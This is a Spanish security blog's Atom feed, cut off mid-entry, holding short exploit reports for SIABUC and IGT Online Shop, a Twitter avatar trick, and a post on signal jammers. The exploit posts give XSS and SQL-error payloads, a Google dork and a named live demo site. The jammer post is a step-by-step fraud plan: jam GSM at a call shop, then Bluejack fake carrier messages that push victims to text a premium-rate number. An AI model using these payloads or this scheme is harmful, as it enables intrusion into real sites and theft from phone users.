<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5347676997303684143</id><updated>2012-02-24T13:44:37.578-08:00</updated><category term='codes'/><category term='Personal'/><category term='Vulnerabilidades'/><category term='Redes'/><category term='Hacking General'/><category term='Pentesting'/><category term='Exposed&apos;s'/><category term='privacidad'/><category term='Tutoriales'/><category term='Linux'/><category term='Auditorias'/><category term='Ing-Social'/><category term='Exploits'/><category term='Ezines'/><category term='Malwares'/><category term='Phreaking'/><category term='Tips'/><category term='Criptografia'/><category term='Bug Report'/><title type='text'>Maztor [In]-Security</title><subtitle type='html'>Blog tematico orientado a la seguridad informatica, pentesting, vulnerabilidades, programacion y demas.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-6873174361013302884</id><published>2012-02-24T12:28:00.005-08:00</published><updated>2012-02-24T13:44:37.583-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bug Report'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Xss &amp; Full path Disclosure WebApp Library SIABUC</title><content type='html'># Author: Mazt0r&lt;br /&gt;# Exploit Title: XSS &amp; Full Path Disclosure SIABUC&lt;br /&gt;# Date: 24/02/2012&lt;br /&gt;# software: SIABUC&lt;br /&gt;# link: http://siabuc.ucol.mx/&lt;br /&gt;# Version: Version 1.2 [Other versions "NO TESTED"]&lt;br /&gt;# Category: webapps Library&lt;br /&gt;# Tested on: Linux&lt;br /&gt;&lt;br /&gt;Demo:http://www.cidcacs.iis.ucr.ac.cr/&lt;br /&gt;&lt;br /&gt;----------------&lt;br /&gt;Vulnerable&lt;br /&gt;----------------&lt;br /&gt;/reservacion/index.php &lt;br /&gt;/reservacion/include/buscar.php&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;======================&lt;br /&gt;&lt;br /&gt;http://localhost/reservacion/index.php &lt;br /&gt;&lt;br /&gt;POST: XSS&lt;br /&gt;Result: /reservacion/include/buscar.php&lt;br /&gt;======================&lt;br /&gt;Example:&lt;br /&gt;======================&lt;br /&gt;&lt;br /&gt;|---------------------|&lt;br /&gt;|" &gt; &lt; h1 &gt; A &lt; / h1 &gt;|&lt;br /&gt;|---------------------|&lt;br /&gt;\&lt;br /&gt;- Execution Code&lt;br /&gt;&lt;br /&gt;Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;Blog: maztor.blogspot.com&lt;br /&gt;Twitter: @Mazt0r&lt;br /&gt;----------------------------------&lt;br /&gt;&lt;br /&gt;&lt;b&gt;LINK:&lt;/b&gt;&lt;a href="http://paste2.org/p/1914911"&gt; Report&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-6873174361013302884?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/6873174361013302884/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2012/02/xss-full-path-disclosure-webapp-library.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6873174361013302884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6873174361013302884'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2012/02/xss-full-path-disclosure-webapp-library.html' title='Xss &amp; Full path Disclosure WebApp Library SIABUC'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4441124211658644443</id><published>2012-02-24T11:53:00.002-08:00</published><updated>2012-02-24T12:14:10.717-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bug Report'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Exploit  Full path disclosure and Sql Error ONLINE SHOP IGT</title><content type='html'># Author: Mazt0r&lt;br /&gt;# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT&lt;br /&gt;# Date: 24/02/2012&lt;br /&gt;# software: IGT Online Shop&lt;br /&gt;# link: http://www.igt.com.hk &lt;br /&gt;# Version: ALL&lt;br /&gt;# Category: webapps&lt;br /&gt;# Google dork: inurl:company_index.php&lt;br /&gt;# Tested on: Linux&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;----------------&lt;br /&gt;Vulnerability&lt;br /&gt;----------------&lt;br /&gt;&lt;br /&gt;Exploit:&lt;br /&gt;======================&lt;br /&gt;&lt;br /&gt;http://localhost/path/company_index.php?id=[ID#NUMBER]&amp;file=home&amp;prod=&amp;uid=[FPD &amp; ERROR SQL]&lt;br /&gt;&lt;br /&gt;======================&lt;br /&gt;Example:&lt;br /&gt;======================&lt;br /&gt;&lt;br /&gt;http://Mazt0rsite.com/company_index.php?id=245&amp;file=home&amp;prod=prod&amp;uid=&lt;br /&gt;&lt;br /&gt;Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3&lt;br /&gt;&lt;br /&gt;Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1  [PWNED XD]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------&lt;br /&gt;Blog: maztor.blogspot.com&lt;br /&gt;Twitter: @Mazt0r&lt;br /&gt;----------------------------------&lt;br /&gt;========================  Camaradas! DDLR &amp; CL ===============================================&lt;br /&gt;Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer&lt;br /&gt;-------------------------------------------------------------------------------------------===&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;LINK:&lt;/b&gt; &lt;a href="http://paste2.org/p/1914893"&gt;Exploit&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4441124211658644443?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4441124211658644443/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2012/02/exploit-full-path-disclosure-and-sql.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4441124211658644443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4441124211658644443'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2012/02/exploit-full-path-disclosure-and-sql.html' title='Exploit  Full path disclosure and Sql Error ONLINE SHOP IGT'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-4513413681428169336</id><published>2012-02-10T16:46:00.000-08:00</published><updated>2012-02-10T16:47:02.381-08:00</updated><title type='text'>Inactividad por unas semanas!</title><content type='html'>Bueno, debido a mi reciente ingreso a la universidad me temo que al estar en un ambiente nuevo, no se aun a lo que me enfrento, en referencia a esto me dedicare estas semanas iniciales al estudio para coger campo y no distraerme de forma externa, una vez me haya acostumbrado seguire escribiendo los articulos como se venia haciendo anteriormente.&lt;br /&gt;&lt;br /&gt;Saludos! Espero me comprendan.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-4513413681428169336?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/4513413681428169336/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2012/02/inactividad-por-unas-semanas.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4513413681428169336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/4513413681428169336'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2012/02/inactividad-por-unas-semanas.html' title='Inactividad por unas semanas!'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1039001418385513674</id><published>2012-01-17T12:11:00.000-08:00</published><updated>2012-01-17T12:20:25.676-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='privacidad'/><title type='text'>Avatar Antikiddies [Evasion de inexpertos LOGUEADOS]</title><content type='html'>Bueno esta entrada es algo peculiar y a manera de JODA en su momento, Sin nada que hacer me di cuenta que la red social de Twitter tiene unos pequeños bugs de px preestablecidos en sus avatars, ya que lo que hace es tomar una proporcion central de una imagen y tomarlo como pic personal, Tambien hay otra forma de poner una imagen de proporciones NO PERMITIDAS EN TWITTER, asi como lo hizo @Xianur0 hace un tiempo poniendo una imagen gigantezca para joder un rato.&lt;br /&gt;&lt;br /&gt;Aprovechando estos pequeños errores se puede organizar una imagen proporcional que haga 3 funciones, La de AVATAR , la funcion loca de mantener la privacidad del perfil y que ALERTE al individuo mediante un CARTEL, generando como resultado una imagen similar a esta.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8wCz9oXV14M/TxXQ0nhuhaI/AAAAAAAAAGk/ryjIaThvAGQ/s1600/d_reasonably_small333.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="52" width="320" src="http://4.bp.blogspot.com/-8wCz9oXV14M/TxXQ0nhuhaI/AAAAAAAAAGk/ryjIaThvAGQ/s320/d_reasonably_small333.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://subir-imagenes.es/images/dreasonabl.gif"&gt;Plantilla Avatar Antikiddies&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Al subir esta imagen organizada en PX y en sus sectores adecuados se obtiene un perfil con los siguientes resultados:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-gEzbbB_UyXg/TxXStwZRUEI/AAAAAAAAAGw/ptoMLfmKLF8/s1600/Capqrwqwrtura.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="97" width="320" src="http://4.bp.blogspot.com/-gEzbbB_UyXg/TxXStwZRUEI/AAAAAAAAAGw/ptoMLfmKLF8/s320/Capqrwqwrtura.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Como se puede observar Solo sale un sector de mi avatar el cual es el adecuado para el perfil, pero si vemos muy bien sus proporciones notamos la barrera TRANSPARENTE como si se tratara de layers, la funcion de esta barrera es que UN USUARIO LOGUEADO no pueda ver los links que listan SEGUIDORES, SEGUIDOS, TWEETS, LISTAS.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-0Crp6M-H-N8/TxXTsWYi4tI/AAAAAAAAAG8/dlRVKS-H13o/s1600/eerwerwer.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="58" width="320" src="http://3.bp.blogspot.com/-0Crp6M-H-N8/TxXTsWYi4tI/AAAAAAAAAG8/dlRVKS-H13o/s320/eerwerwer.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;------------&lt;i&gt;ESTA BARRERA SOLO SIRVE CUANDO UN USUARIO ESTA LOGUEADO&lt;/i&gt;----------------&lt;br /&gt;&lt;br /&gt;Ya vimos como se reparten las distintas secciones del avatar, ahora veamos que pasa si le damos click al link de SEGUIDORES.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ios4stYKnGw/TxXUmhbx9qI/AAAAAAAAAHI/7oVYLlqV-Zk/s1600/fasafaf.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="144" width="278" src="http://3.bp.blogspot.com/-ios4stYKnGw/TxXUmhbx9qI/AAAAAAAAAHI/7oVYLlqV-Zk/s320/fasafaf.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Se resalta el sector protegido y te lleva a la Alerta que habiamos sectoreado en el avatar.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-mip3_Vnbb68/TxXU0S4WG4I/AAAAAAAAAHU/MDXl949pO9g/s1600/wetete.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="75" width="320" src="http://3.bp.blogspot.com/-mip3_Vnbb68/TxXU0S4WG4I/AAAAAAAAAHU/MDXl949pO9g/s320/wetete.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Conclusion:&lt;/b&gt; Este Avatar Antikiddies como su nombre lo dice sirve para los usuarios Inexpertos o de ignorancia en el tema, que al estar logueados no podran visualizar ciertos links de interes en un perfil definido.&lt;br /&gt;&lt;br /&gt;Cabe aclarar que esto NO PROTEGE UN 50% esos links, debido a que si no se esta logueado se podran ver perfectamente, al igual que si se quita la imagen mediante complementos como "Web developer" o viendo la cuenta mediante cualquier cliente.&lt;br /&gt;&lt;br /&gt;Esta imagen sectoreada ademas de este objetivo se puede aplicar como medio de burla y diversion.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1039001418385513674?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1039001418385513674/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2012/01/avatar-antikiddies-evasion-de.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1039001418385513674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1039001418385513674'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2012/01/avatar-antikiddies-evasion-de.html' title='Avatar Antikiddies [Evasion de inexpertos LOGUEADOS]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-8wCz9oXV14M/TxXQ0nhuhaI/AAAAAAAAAGk/ryjIaThvAGQ/s72-c/d_reasonably_small333.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-6845598091583844357</id><published>2011-12-17T17:57:00.001-08:00</published><updated>2012-02-22T16:00:58.731-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Redes'/><category scheme='http://www.blogger.com/atom/ns#' term='Phreaking'/><category scheme='http://www.blogger.com/atom/ns#' term='Ing-Social'/><title type='text'>Inhibidores de Señal 2da parte [El escenario perfecto] [GSM-Bluetooth]</title><content type='html'>Como era de esperarse... aqui les tengo la segunda parte de "inhibidores de Señal" que les habia prometido en el articulo anterior.&lt;br /&gt;&lt;br /&gt;Este segundo solo tratara de señales GSM y Bluetooth, las cuales mostraré como hacer un ataque dirigido, el cual se realizará con informacion que tengamos a la mano.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://images04.olx.es/ui/2/17/12/36341512_1.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="400" width="400" src="http://images04.olx.es/ui/2/17/12/36341512_1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Primero que nada un poco de terminologias...&lt;br /&gt;-----------------------------------------------------------------------------------&lt;br /&gt;&lt;b&gt;GSM&lt;/b&gt;&lt;br /&gt;&lt;i&gt;Segun wikipedia..&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;El sistema global para las comunicaciones móviles (GSM, proviene del francés groupe spécial mobile) es un sistema estándar, libre de regalías, de telefonía móvil digital.&lt;br /&gt;&lt;br /&gt;Un cliente GSM puede conectarse a través de su teléfono con su computador y enviar y recibir mensajes por correo electrónico, faxes, navegar por Internet, acceder con seguridad a la red informática de una compañía (red local/Intranet), así como utilizar otras funciones digitales de transmisión de datos, incluyendo el servicio de mensajes cortos (SMS) o mensajes de texto.&lt;br /&gt;&lt;br /&gt;GSM se considera, por su velocidad de transmisión y otras características, un estándar de segunda generación (2G). Su extensión a 3G se denomina UMTS y difiere en su mayor velocidad de transmisión, el uso de una arquitectura de red ligeramente distinta y sobre todo en el empleo de diferentes protocolos de radio (W-CDMA).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://es.wikipedia.org/wiki/GSM"&gt;Seguir leyendo el texto de wikipedia&lt;/a&gt;&lt;br /&gt;-----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bueno iniciemos la objetividad de este articulo...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Ya hemos leido anteriormente sobre &lt;i&gt;1-Inhibidores 2-señales 3-GSM&lt;/i&gt;; con estos terminos bien claros supongo que podras tomarte mas idea... de lo que realmente hablo y planteo en esta serie de articulos.&lt;br /&gt;&lt;br /&gt;Ahora debemos plantear un NUEVO! "ESCENARIO PERFECTO" desde la perspectiva de un "Atacante Malicioso", Este nuevo Escenario será.. "EL PUESTO DE LLAMADAS" del cual nos aprovecharemos de su multitud de gente alterada y con poco tiempo disponible.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nuestro Escenario:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-BtRzWXl5zC0/TjCQpTQfEhI/AAAAAAAAAGE/8SolnNIYfEI/s320/Llamadas.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="240" src="http://1.bp.blogspot.com/-BtRzWXl5zC0/TjCQpTQfEhI/AAAAAAAAAGE/8SolnNIYfEI/s320/Llamadas.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Puesto de llamada de nivel:&lt;/b&gt; Intermedio&lt;br /&gt;&lt;b&gt;Encargados del puesto de llamadas:&lt;/b&gt; 1&lt;br /&gt;&lt;b&gt;Cantidad de personas hablando por cel:&lt;/b&gt; 12&lt;br /&gt;&lt;b&gt;Cantidad de personas en espera:&lt;/b&gt; 6&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Ahora procedamos a realizar nuestro ataque, que en este caso el beneficio sera...?&lt;br /&gt;&lt;i&gt;DINERO $$$&lt;/i&gt;, la idea de esto es lograr que el encargado o uno de sus clientes nos transfiera una suma grande de dinero mediante un simple SMS, el cual estara todo "PLANEADO" por asi decir..&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota clave:&lt;/b&gt; de logica sabemos que los puntos de llamada "LA MAYORIA" son de planes "POSTPAGO", es importante saberlo porque te permite dar nocion a cual gran suma poner en tu servicio de cobro.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Primero que nada deberiamos tener un haz bajo la manga y este seria un Servicio SMS que configurariamos para que sea de cobro, eso si un cobro de gran SUMA! el cual si un telefono postpago envia un SMS al numero de nuestro servicio le cobraria la alta suma que habiamos puesto antes... que lindo no?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Iniciemos...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Con nuestro servicio SMS pedido y configurado solo procedemos a usarlo? pero de una forma arbirtraria y sin aviso alguno...&lt;br /&gt;&lt;br /&gt;Vamos a montar nuestro &lt;i&gt;INHIBIDOR de SEÑAL GSM&lt;/i&gt; :) cerca del puesto de llamadas objetivo, el cual la comunicacion se cortara en esa zona...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora con un sistema de administracion Bluetooth, ya sea un Smartphone con una APP especifica o lo mas recomendable una PC CON BLUETOOTH vamos a analizar todos los dispositivos activos en ese sector para proceder a enviar nuestro "SMS Señuelo".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;La pregunta sera..como enviare el SMS si el GSM esta inactivo en esa zona, y peor aun no se los numeros!!??&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Primero que nada el GSM esta inactivo, bien dicho!... pero la señal bluetooth no :)&lt;br /&gt;segundo, realmente no enviaremos un SMS asi que no necesitaremos numero telefonico, haremos uso de la tecnica Bluejacking!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://elvirtual.es/wp-content/uploads/2009/10/bjck2.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="176" width="350" src="http://elvirtual.es/wp-content/uploads/2009/10/bjck2.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Termino Bluejacking:&lt;/b&gt;&lt;br /&gt;En seguridad informática, el término bluejacking se refiere a una técnica consistente en enviar mensajes no solicitados entre dispositivos Bluetooth, como por ejemplo teléfonos móviles, PDAs o portátiles. La tecnología Bluetooth tiene un alcance limitado de unos 10 metros normalmente en dispositivos pequeños (como teléfonos móviles) aunque otros aparatos más grandes (como portátiles) con transmisores más potentes pueden alcanzar los 100 metros. (Segun wikipedia)&lt;br /&gt;---------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Mientras analizamos los dispositivos activos bluetooth debemos ver y coordinar los MTS a la redonda ademas de ver que dispositivos son los que podrian recibir los "SMS Arbirtrarios".&lt;br /&gt;&lt;br /&gt;Una vez obtenido nuestra lista de objetivos y puntos clave para que reciban nuestro señuelo, debemo armar nuestra LETTER Corporativa la cual contendra el Numero de nuestro servicio.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Letter corporativa de Ejemplo:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Sr usuario la señal de su dispositivo movil se ha desactivado por inconvenientes, esta sera habilitada dentro de las proximas 72 hrs, si su linea es de vital importancia debido a su ocupacion, puede restaurarla enviando un SMS con la palabra RESTAURAR al 6666&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota:&lt;/b&gt; donde 6666 es nuestro numero de servicio SMS el cual es de un costo altisimo...&lt;br /&gt;-------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Una vez enviado los SMS SEÑUELO a todos los de nuestra lista de objetivos a la redonda, estos o algunos.. intentaran la restauracion de su servicio.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;La pregunta ahora es... serà que van a caer?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Primero que todo pensemos... El escenario del Puesto de llamadas fue planteado por las siguientes razones...&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Si el encargado tiene su bluetooth activado y recibe esto que pasa?&lt;br /&gt;&lt;br /&gt;&lt;b&gt;a-&lt;/b&gt;casi un 90 % seguro que lo hace, por que su ocupacion esta siendo suspendida la cual le generaria perdidas...&lt;br /&gt;&lt;br /&gt;&lt;b&gt;b-&lt;/b&gt; la multitud de gente en espera lo pone en un momento de poco pensar y de mucho hacer, asi que la solucion esta en el sms que se le envio y asi podra seguir y dejar a sus clientes satisfechos&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; Que pasa si el encargado no esta con bluetooth activo?&lt;br /&gt;&lt;b&gt;a-&lt;/b&gt; para eso dige que hay que sacar la lista de objetivos...por que de seguro muchos tienen llamadas importantes que hacer y no dudaran ni un min para hacer un pronto reestablecimiento de su servicio.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Una vez que estos reciban los SMS señuelos debemos apagar nuestro inhibidor por unos segundos, muy recomendable unos 30 Seg... y enviar un nuevo SMS que diga..&lt;br /&gt;&lt;br /&gt;Letter Ejemplo 2:&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt;Su servicio esta en mantenimiento y se generara una intermitencia en su señal, si desea restaurar su servicio lo mas pronto posible, favor enviar un SMS con la palabra RESTAURAR al numero 6666.&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------------&lt;br /&gt;&lt;i&gt;Se desactiva el inhibidor....&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Rectificando mucho el atacante en su Servicio de SMS podria notar si aun los dispositvos objetivos no han dado respuesta...cuando este note si se ha logrado captar una gran suma.. ya deberia dejar de activar su inhibidor y dejar todo estable.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Nota:&lt;/b&gt; El estado de intermitencia de un inhibidor se hace con el objetivo de persistir y que se haga mas tedioso para los usuarios.. con el fin de que su desespero los haga tratar de restablecer su servicio lo mas pronto posible mediante las instrucciones que se le dieron en el sms.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusion:&lt;/b&gt; Este articulo fue creado desde la perspectiva de un atacante malicioso, sin ningun motivo de orientar al robo y con la simple gracia de enseñar y notificar las infinidades de tecnicas que se pueden usar en este "Escenario" tan inseguro!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-6845598091583844357?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/6845598091583844357/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/12/inhibidores-de-senal-2da-parte-el.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6845598091583844357'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/6845598091583844357'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/12/inhibidores-de-senal-2da-parte-el.html' title='Inhibidores de Señal 2da parte [El escenario perfecto] [GSM-Bluetooth]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-BtRzWXl5zC0/TjCQpTQfEhI/AAAAAAAAAGE/8SolnNIYfEI/s72-c/Llamadas.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-3734399120659335845</id><published>2011-12-07T19:01:00.000-08:00</published><updated>2011-12-07T19:53:06.205-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Redes'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking General'/><title type='text'>Inhibidores de Señal [El escenario perfecto] [WIFI]</title><content 